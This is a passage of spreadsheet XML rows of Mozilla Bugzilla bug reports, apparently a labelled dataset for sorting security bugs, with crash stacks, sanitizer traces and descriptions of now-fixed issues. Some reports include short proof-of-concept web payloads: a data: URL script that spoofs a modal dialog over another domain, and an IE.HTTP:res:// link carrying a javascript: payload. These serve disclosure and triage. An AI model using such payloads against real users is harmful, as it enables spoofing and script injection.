      </c>
      <c r="X2373" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2374">
      <c r="A2374" t="n">
        <v>1609607</v>
      </c>
      <c r="B2374" t="inlineStr">
        <is>
          <t>2020-01-15 22:25:55 -0800</t>
        </is>
      </c>
      <c r="C2374" t="inlineStr">
        <is>
          <t>C-C TB mochitest+valgrind uncovered uninitialized memory access.: MD5 is calculated accessing uninitialized area.</t>
        </is>
      </c>
      <c r="D2374" t="inlineStr">
        <is>
          <t>2020-08-08 09:41:17 -0700</t>
        </is>
      </c>
      <c r="E2374" t="n">
        <v>1</v>
      </c>
      <c r="F2374" t="n">
        <v>1</v>
      </c>
      <c r="G2374" t="n">
        <v>3</v>
      </c>
      <c r="H2374" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2374" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2374" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K2374" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2374" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2374" t="inlineStr"/>
      <c r="Q2374" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2374" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2374" t="inlineStr">
        <is>
          <t>Thunderbird 74.0</t>
        </is>
      </c>
      <c r="T2374" t="n">
        <v>1</v>
      </c>
      <c r="U2374" t="n">
        <v>0</v>
      </c>
      <c r="V2374" t="n">
        <v>22</v>
      </c>
      <c r="W2374" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1608539 +++
That bug is about the following.
--- BEGIN QUOTE ---
The subject says it all
|m_headerstartpos| is not always initialized in nsParseMailMessageState::FinalizeHeaders() 
The unitinitialized reference happens at
https://searchfox.org/comm-central/source/mailnews/local/src/nsParseMailbox.cpp#1223
I found this by running xpcshell-tests under valgrind.
If m_headerstartpos is not properly initialized, literally anything goes. 
Header parsing, etc. get all screwed up.
The symptom of strange display of message in a message pane that shows only blank or in the middle of header, etc. could be at least partially explained by this bug. (Maybe not all the cases.)
I detected the issue using valgrind,  and then began dumping m_headerstartpos after I set
```
export MALLOC_CHECK_=3
export MALLOC_PERTURB_=0x5A
```
in my environment. GNU libc malloc fills the uninitialized malloc'ed area with 0xA5.
Thus it is rather easy to find it in an otherwise normal dump.
```
cf. From man mallopt.
       M_PERTURB (since glibc 2.4)
              If this parameter is set to a nonzero value, then bytes of allocated memory  (other  than  alloca‐
              tions  via calloc(3)) are initialized to the complement of the value in the least significant byte
              of value, and when allocated memory is released using free(3), the freed  bytes  are  set  to  the
              least  significant  byte  of value.  This can be useful for detecting errors where programs incor‐
              rectly rely on allocated memory being initialized to zero, or reuse values in memory that has  al‐
              ready been freed.
   ...
       MALLOC_PERTURB_
              Controls the same parameter as mallopt() M_PERTURB.
```
--- END QUOTE ---
From the comment 2 of that bug.
--- BEGIN QUOTE ---
Oh, BTW, I notice that the hash calculation touches uninitialized memory region. The last hunk in the attached diff is for investigating this.
I knew that for a long time. But I let it pass since it is not unusual for some hash functions to
calculate the value using 4 or 8 octets at a time, and thus if we have interesting data which has a length of not multiple of 4, we may end up
accessing the last few uninitialized octets of a word: this happens in zip/unzip operation during |make mozmill| test
and I have suppressed the warning from valgrind after investigation revealed that it is a non-issue.
However, with this uninitialized memory access issue at hand, I investigated a bit more, and I now realized that uninitialized access during hash calcluation MAY end up generating message-ID for a message which does not have it to be attached a non-unique message ID.: that is, the message ID varies each time it is generated because of random data in uninitiailized memory. (Correct me if I am wrong here.)
This may happen when you import a message in an individual file and the message lacks a message ID.
If you include it in multiple folders, the same message will have a different message ID in different folders. So this may not be optimal.
But the practical impact of having the message with different message ID is not that great if I am not mistaken again.
HOWEVER, during investigation, I have noticed a glaring uninitialized memory creation and access in the code which I will report later. I am overwhelmed at what is going on and not sure where the problem begins, even.
--- END QUOTE ---</t>
        </is>
      </c>
      <c r="X2374" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2375">
      <c r="A2375" t="n">
        <v>1508776</v>
      </c>
      <c r="B2375" t="inlineStr">
        <is>
          <t>2018-11-20 12:05:40 -0800</t>
        </is>
      </c>
      <c r="C2375" t="inlineStr">
        <is>
          <t>UAF in sftk_FreeSession due to improper refcounting</t>
        </is>
      </c>
      <c r="D2375" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:23 -0800</t>
        </is>
      </c>
      <c r="E2375" t="n">
        <v>1</v>
      </c>
      <c r="F2375" t="n">
        <v>1</v>
      </c>
      <c r="G2375" t="n">
        <v>3</v>
      </c>
      <c r="H2375" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2375" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2375" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2375" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2375" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2375" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main71+]</t>
        </is>
      </c>
      <c r="Q2375" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2375" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2375" t="inlineStr">
        <is>
          <t>3.47</t>
        </is>
      </c>
      <c r="T2375" t="n">
        <v>1</v>
      </c>
      <c r="U2375" t="n">
        <v>0</v>
      </c>
      <c r="V2375" t="n">
        <v>37</v>
      </c>
      <c r="W2375" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-ec6e8cfb-9c0b-4e68-9917-977e80181120.
=============================================================
Seen while looking at nightly crash stats. 1 crash so far, but there are several other similar signatures in the same build ID: 20181120100045. Some of the crash reports have safebrowing stuff in the stack.
*https://crash-stats.mozilla.com/report/index/5e48d3a0-ac12-4463-84ee-fb62f0181120 - 
[@ sftk_ObjectFromHandle]
* https://crash-stats.mozilla.com/report/index/aa4a675d-1dae-4b22-9698-355130181120 - [@ sftk_SessionFromHandle ]
* https://crash-stats.mozilla.com/report/index/18de7f1b-8ec5-4fc1-8784-42ac90181120
* https://crash-stats.mozilla.com/report/index/7b929956-332a-4de6-8f53-6c5100181120
Possible regression range based on Build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=e44bb5b4bc79be613d29b3f95d7b508e68e3d128&amp;tochange=eeddcefcdad847bf8a5737153079e9619ee5aa66
Top 10 frames of crashing thread:
0  @0x1cdb1e67a80 
1 softokn3.dll sftk_FreeSession security/nss/lib/softoken/pkcs11u.c:1868
2 softokn3.dll NSC_DigestUpdate security/nss/lib/softoken/pkcs11c.c:1794
3 nss3.dll PK11_DigestOp security/nss/lib/pk11wrap/pk11cxt.c:783
4 xul.dll nsCryptoHash::Update security/manager/ssl/nsCryptoHash.cpp:116
5 xul.dll nsresult mozilla::safebrowsing::LookupCacheV4::VerifyChecksum toolkit/components/url-classifier/LookupCacheV4.cpp:416
6 xul.dll mozilla::safebrowsing::LookupCacheV4::LoadFromFile toolkit/components/url-classifier/LookupCacheV4.cpp:205
7 xul.dll nsresult mozilla::safebrowsing::LookupCache::LoadPrefixSet toolkit/components/url-classifier/LookupCache.cpp:478
8 xul.dll mozilla::safebrowsing::LookupCache::Open toolkit/components/url-classifier/LookupCache.cpp:83
9 xul.dll class RefPtr&lt;mozilla::safebrowsing::LookupCache&gt; mozilla::safebrowsing::Classifier::GetLookupCache toolkit/components/url-classifier/Classifier.cpp:1526
=============================================================</t>
        </is>
      </c>
      <c r="X2375" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2376">
      <c r="A2376" t="n">
        <v>329177</v>
      </c>
      <c r="B2376" t="inlineStr">
        <is>
          <t>2006-03-02 18:13:31 -0800</t>
        </is>
      </c>
      <c r="C2376" t="inlineStr">
        <is>
          <t>Bugzilla fails when there are no keywords</t>
        </is>
      </c>
      <c r="D2376" t="inlineStr">
        <is>
          <t>2006-03-02 18:37:28 -0800</t>
        </is>
      </c>
      <c r="E2376" t="n">
        <v>1</v>
      </c>
      <c r="F2376" t="n">
        <v>1</v>
      </c>
      <c r="G2376" t="n">
        <v>4</v>
      </c>
      <c r="H2376" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2376" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2376" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K2376" t="inlineStr">
        <is>
          <t>2.23</t>
        </is>
      </c>
      <c r="L2376" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2376" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2376" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2376" t="inlineStr"/>
      <c r="Q2376" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2376" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2376" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2376" t="n">
        <v>1</v>
      </c>
      <c r="U2376" t="n">
        <v>0</v>
      </c>
      <c r="V2376" t="n">
        <v>5</v>
      </c>
      <c r="W2376" t="inlineStr">
        <is>
          <t>globals.pl used to check for the existence of @::legal_versions to determine whether or not versioncache had been read in.
In bug 328602 I eliminated @::legal_versions, and replaced that with a check for @::legal_keywords.
However, apparently perl thinks that @::legal_keywords is actually *undefined* if it's empty, causing globals.pl to die, thinking that it couldn't regenerate versioncache.
Since we're removing versioncache anyway, let's just remove that check entirely. It serves basically no purpose -- if I couldn't generate versioncache the first time, I can't do it the second time either.</t>
        </is>
      </c>
      <c r="X2376" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2377">
      <c r="A2377" t="n">
        <v>1368981</v>
      </c>
      <c r="B2377" t="inlineStr">
        <is>
          <t>2017-05-31 03:46:59 -0700</t>
        </is>
      </c>
      <c r="C2377" t="inlineStr">
        <is>
          <t>Firefox allows you to insert modal dialog in any domain</t>
        </is>
      </c>
      <c r="D2377" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:59 -0700</t>
        </is>
      </c>
      <c r="E2377" t="n">
        <v>1</v>
      </c>
      <c r="F2377" t="n">
        <v>1</v>
      </c>
      <c r="G2377" t="n">
        <v>3</v>
      </c>
      <c r="H2377" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2377" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2377" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2377" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2377" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2377" t="inlineStr">
        <is>
          <t>[adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796</t>
        </is>
      </c>
      <c r="Q2377" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2377" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2377" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2377" t="n">
        <v>0</v>
      </c>
      <c r="U2377" t="n">
        <v>0</v>
      </c>
      <c r="V2377" t="n">
        <v>12</v>
      </c>
      <c r="W2377" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
1- Go to:
data:text/html,&lt;script&gt;function loadIframe() {win = open('','_top');win.document.open();win.document.write('data:text/html,&lt;s'+'cript&gt;location="https://www.google.com";&lt;/s'+'cript&gt;');win.document.close();}function go() {var iframe = '&lt;iframe onload="loadIframe();"&gt;&lt;/iframe&gt;';document.body.innerHTML = iframe; showModalDialog('https://www.firefox.com','','dialogWidth=600;dialogHeight=600');}&lt;/script&gt;&lt;input type="button" onclick="go()" value="test"/&gt;
2- Click button
Bug detected in Firefox browsers that do not use multi-process architecture or e10s
Tested in:
Firefox Nightly 55.0a1 (2017-05-17) (64-bit)
Firefox Developer Edition 54.0a2 (2017-04-18) (32-bits)
Firefox 53.0.2 (32-bit)
Note:
I consider that it is not a variant of the bug with id 1365875 because the showModalDialog method is not part of the three types of native popup boxes in javascript</t>
        </is>
      </c>
      <c r="X2377" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2378">
      <c r="A2378" t="n">
        <v>1619606</v>
      </c>
      <c r="B2378" t="inlineStr">
        <is>
          <t>2020-03-03 05:54:28 -0800</t>
        </is>
      </c>
      <c r="C2378" t="inlineStr">
        <is>
          <t>Add CheckedUnsafePtr to the prefix list</t>
        </is>
      </c>
      <c r="D2378" t="inlineStr">
        <is>
          <t>2020-03-12 08:47:40 -0700</t>
        </is>
      </c>
      <c r="E2378" t="n">
        <v>1</v>
      </c>
      <c r="F2378" t="n">
        <v>1</v>
      </c>
      <c r="G2378" t="n">
        <v>4</v>
      </c>
      <c r="H2378" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2378" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2378" t="inlineStr">
        <is>
          <t>Signature</t>
        </is>
      </c>
      <c r="K2378" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2378" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2378" t="inlineStr"/>
      <c r="Q2378" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2378" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2378" t="n">
        <v>1</v>
      </c>
      <c r="U2378" t="n">
        <v>0</v>
      </c>
      <c r="V2378" t="n">
        <v>9</v>
      </c>
      <c r="W2378" t="inlineStr">
        <is>
          <t>`CheckedUnsafePtr` assertions show up with a very generic signature, as can be seen in https://crash-stats.mozilla.org/report/index/709d791b-1f4f-4b2e-8cff-235380200302, e.g.
The first two frames should be added to the prefix list:
```
mozilla::CheckCheckedUnsafePtrs&lt;mozilla::CrashOnDanglingCheckedUnsafePtr&gt;::Check(nsTArray&lt;mozilla::detail::CheckedUnsafePtrBase&lt;(mozilla::CheckingSupport)0&gt;*&gt;&amp;)
mozilla::detail::SupportCheckedUnsafePtrImpl&lt;mozilla::CrashOnDanglingCheckedUnsafePtr, (mozilla::CheckingSupport)0&gt;::~SupportCheckedUnsafePtrImpl()
```</t>
        </is>
      </c>
      <c r="X2378" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2379">
      <c r="A2379" t="n">
        <v>496712</v>
      </c>
      <c r="B2379" t="inlineStr">
        <is>
          <t>2009-06-06 07:16:30 -0700</t>
        </is>
      </c>
      <c r="C2379" t="inlineStr">
        <is>
          <t>[mostly try server] Corrupt file system on slaves with NTFS drives ("Circular directory structure")</t>
        </is>
      </c>
      <c r="D2379" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2379" t="n">
        <v>1</v>
      </c>
      <c r="F2379" t="n">
        <v>1</v>
      </c>
      <c r="G2379" t="n">
        <v>5</v>
      </c>
      <c r="H2379" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2379" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2379" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2379" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2379" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2379" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N2379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2379" t="inlineStr"/>
      <c r="Q2379" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2379" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2379" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2379" t="n">
        <v>1</v>
      </c>
      <c r="U2379" t="n">
        <v>0</v>
      </c>
      <c r="V2379" t="n">
        <v>46</v>
      </c>
      <c r="W2379" t="inlineStr">
        <is>
          <t>I submitted a try server patch and got the following from the WINCE builder:
http://tinderbox.mozilla.org/showlog.cgi?log=MozillaTry/1244297278.1244297292.19205.gz
rm: WARNING: Circular directory structure.
This almost certainly means that you have a corrupted file system.
NOTIFY YOUR SYSTEM MANAGER.
The following two directories have the same inode number:
build/objdir/xulrunner/profile
`build/objdir/xulrunner/profile/public/_xpidlgen'
I'm not sure what this means, but I thought I'd file it for you guys to check it out...</t>
        </is>
      </c>
      <c r="X2379" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2380">
      <c r="A2380" t="n">
        <v>82781</v>
      </c>
      <c r="B2380" t="inlineStr">
        <is>
          <t>2001-05-25 13:58:05 -0700</t>
        </is>
      </c>
      <c r="C2380" t="inlineStr">
        <is>
          <t>describecomponents.cgi doesn't check viewing permissions</t>
        </is>
      </c>
      <c r="D2380" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:24 -0800</t>
        </is>
      </c>
      <c r="E2380" t="n">
        <v>1</v>
      </c>
      <c r="F2380" t="n">
        <v>1</v>
      </c>
      <c r="G2380" t="n">
        <v>4</v>
      </c>
      <c r="H2380" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2380" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2380" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2380" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2380" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2380" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2380" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2380" t="inlineStr"/>
      <c r="Q2380" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2380" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2380" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T2380" t="n">
        <v>1</v>
      </c>
      <c r="U2380" t="n">
        <v>0</v>
      </c>
      <c r="V2380" t="n">
        <v>7</v>
      </c>
      <c r="W2380" t="inlineStr">
        <is>
          <t>I faced this one with my private installation of BugZilla 2.12 (see URL).
If you log in a user that isn't allowed to view all groups assinged to products,
the products he has no permissions for are excluded in enter_bug.cgi as well as
in query.cgi - but they still show up in describecomponents.cgi
I even can view all entries there if I'm not logged in as any user...</t>
        </is>
      </c>
      <c r="X2380" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2381">
      <c r="A2381" t="n">
        <v>1552627</v>
      </c>
      <c r="B2381" t="inlineStr">
        <is>
          <t>2019-05-17 19:12:39 -0700</t>
        </is>
      </c>
      <c r="C2381" t="inlineStr">
        <is>
          <t>Lack of mitigation on external protocol execution (res: protocol)</t>
        </is>
      </c>
      <c r="D2381" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:34 -0700</t>
        </is>
      </c>
      <c r="E2381" t="n">
        <v>1</v>
      </c>
      <c r="F2381" t="n">
        <v>1</v>
      </c>
      <c r="G2381" t="n">
        <v>3</v>
      </c>
      <c r="H2381" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2381" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2381" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2381" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2381" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2381" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2381" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2381" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2381" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2381" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2381" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T2381" t="n">
        <v>1</v>
      </c>
      <c r="U2381" t="n">
        <v>0</v>
      </c>
      <c r="V2381" t="n">
        <v>26</v>
      </c>
      <c r="W2381" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1549833 +++
Essentially the same as bug 1549833, except you can launch IE with the IE.HTTP: scheme. Example: 
IE.HTTP:res://apds.dll/redirect.html?target=javascript:alert(1)
IE.HTTP: sends the string to IE, and then all the res: payloads from the other bugs work again.
I don't know if there are more IE aliases, but there are a _lot_ of URL Protocols that look at least somewhat risky. Maybe while we're here we can change the default button the external handler dialog to "Cancel" to at least make it a little harder to do by accident (e.g. holding down enter). Could also double the button disable delay -- it's really fast.&lt;</t>
        </is>
      </c>
      <c r="X2381" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2382">
      <c r="A2382" t="n">
        <v>720103</v>
      </c>
      <c r="B2382" t="inlineStr">
        <is>
          <t>2012-01-21 01:19:04 -0800</t>
        </is>
      </c>
      <c r="C2382" t="inlineStr">
        <is>
          <t>ASAN: heap-use-after-free READ of size 8 at nsSMILTimeValueSpec::ConvertBetweenTimeContainers</t>
        </is>
      </c>
      <c r="D2382" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:26 -0700</t>
        </is>
      </c>
      <c r="E2382" t="n">
        <v>1</v>
      </c>
      <c r="F2382" t="n">
        <v>1</v>
      </c>
      <c r="G2382" t="n">
        <v>3</v>
      </c>
      <c r="H2382" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2382" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2382" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2382" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2382" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2382" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2382" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2382" t="inlineStr">
        <is>
          <t>[sg:critical][asan][qa!]</t>
        </is>
      </c>
      <c r="Q2382" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2382" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2382" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T2382" t="n">
        <v>1</v>
      </c>
      <c r="U2382" t="n">
        <v>0</v>
      </c>
      <c r="V2382" t="n">
        <v>32</v>
      </c>
      <c r="W2382" t="inlineStr">
        <is>
          <t>Created attachment 590449
repro-file
Repro-file as attachment.
==21012== ERROR: AddressSanitizer heap-use-after-free on address 0x7fa967597e88 at pc 0x7fa98a245854 bp 0x7fffc4ef2160 sp 0x7fffc4ef2158
READ of size 8 at 0x7fa967597e88 thread T0
    #0 0x7fa98a245854 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1df2854)
    #1 0x7fa98a256c18 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1e03c18)
0x7fa967597e88 is located 8 bytes inside of 32-byte region [0x7fa967597e80,0x7fa967597ea0)
freed by thread T0 here:
    #0 0x40ad84 (/home/ouspg/firefox/objdir-ff-asan/dist/bin/firefox+0x40ad84)
    #1 0x7fa98a2548d5 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1e018d5)
    #2 0x7fa98a24f4c6 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1dfc4c6)
    #3 0x7fa98a24ef4e (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1dfbf4e)
    #4 0x7fa98a259776 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1e06776)
    #5 0x7fa98a256c18 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1e03c18)
previously allocated by thread T0 here:
    #0 0x40ae64 (/home/ouspg/firefox/objdir-ff-asan/dist/bin/firefox+0x40ae64)
    #1 0x7fa98e37613d (/home/ouspg/firefox/objdir-ff-asan/memory/mozalloc/libmozalloc.so+0x113d)
    #2 0x7fa98a24f8cd (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1dfc8cd)
    #3 0x7fa98a24473f (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1df173f)
    #4 0x7fa98a244e05 (/home/ouspg/firefox/objdir-ff-asan/toolkit/library/libxul.so+0x1df1e05)
==21012== ABORTING
Stats: 54M malloced (77M for red zones) by 226646 calls
Stats: 3M realloced by 10807 calls
Stats: 29M freed by 100041 calls
Stats: 0M really freed by 0 calls
Stats: 160M (40979 full pages) mmaped in 40 calls
  mmaps   by size class: 8:196596; 9:32764; 10:8190; 11:6141; 12:2048; 13:1024; 14:512; 15:256; 16:256; 17:32; 18:64; 19:8; 20:4; 
  mallocs by size class: 8:187646; 9:23438; 10:7261; 11:5113; 12:1486; 13:776; 14:463; 15:169; 16:213; 17:23; 18:51; 19:5; 20:2; 
  frees   by size class: 8:78129; 9:12741; 10:4539; 11:2633; 12:830; 13:600; 14:244; 15:132; 16:163; 17:17; 18:10; 19:2; 20:1; 
  rfrees  by size class: 
Stats: malloc large: 81 small slow: 942
Shadow byte and word:
  0x1ff52ceb2fd1: fd
  0x1ff52ceb2fd0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff52ceb2fb0: 00 00 00 00 00 00 fb fb
  0x1ff52ceb2fb8: fb fb fb fb fb fb fb fb
  0x1ff52ceb2fc0: fa fa fa fa fa fa fa fa
  0x1ff52ceb2fc8: fa fa fa fa fa fa fa fa
=&gt;0x1ff52ceb2fd0: fd fd fd fd fd fd fd fd
  0x1ff52ceb2fd8: fd fd fd fd fd fd fd fd
  0x1ff52ceb2fe0: fa fa fa fa fa fa fa fa
  0x1ff52ceb2fe8: fa fa fa fa fa fa fa fa
  0x1ff52ceb2ff0: fd fd fd fd fd fd fd fd
GDB:
(gdb) i r
rax            0x0	0
rbx            0x7fffd8221180	140736819499392
rcx            0x7fffffff9a50	140737488329296
rdx            0x7fffd84a4dc0	140736822136256
rsi            0x8	8
rdi            0x7fffd8221180	140736819499392
rbp            0x8	0x8
rsp            0x7fffffff9940	0x7fffffff9940
r8             0x7ffff7ec6048	140737352851528
r9             0xc2b	3115
r10            0x7fffd8161bc0	140736818715584
r11            0x0	0
r12            0x7fffd84a4dc0	140736822136256
r13            0x0	0
r14            0x3	3
r15            0x7ffff4290b88	140737289718664
rip            0x7ffff42944b6	0x7ffff42944b6 &lt;nsSMILTimeValueSpec::ConvertBetweenTimeContainers(nsSMILTimeValue const&amp;, nsSMILTimeContainer const*)+14&gt;
eflags         0x10202	[ IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) i s
